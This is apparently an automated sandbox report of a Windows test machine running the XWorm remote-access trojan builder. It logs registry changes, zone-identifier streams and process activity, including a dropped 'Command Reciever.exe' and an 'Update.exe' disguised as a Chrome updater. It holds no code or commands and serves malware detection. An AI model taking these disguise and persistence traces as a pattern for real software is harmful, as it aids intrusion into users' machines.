Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16 C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000100000014000000494c200601000400280010001000ffffffff2110ffffffffffffffff424d36000000000000003600000028000000100000004000000001002000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000001000000040000001c0000000100000000000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\30\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0 C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\SniffedFolderType = "Downloads" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\30\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133524141059344388" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000000000001000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main (2).zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe N/A
File opened for modification C:\Users\Admin\Downloads\XWorm-3.1-main.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\XWorm-RAT-main.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe N/A
File opened for modification C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\xworm5.5-main.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe N/A
File opened for modification C:\Users\Admin\Downloads\steal_31.03.24_v2.20.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe N/A
File created C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe\:Zone.Identifier:$DATA C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
File opened for modification C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main (1).zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Xworm-RAT-V3.1-main.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
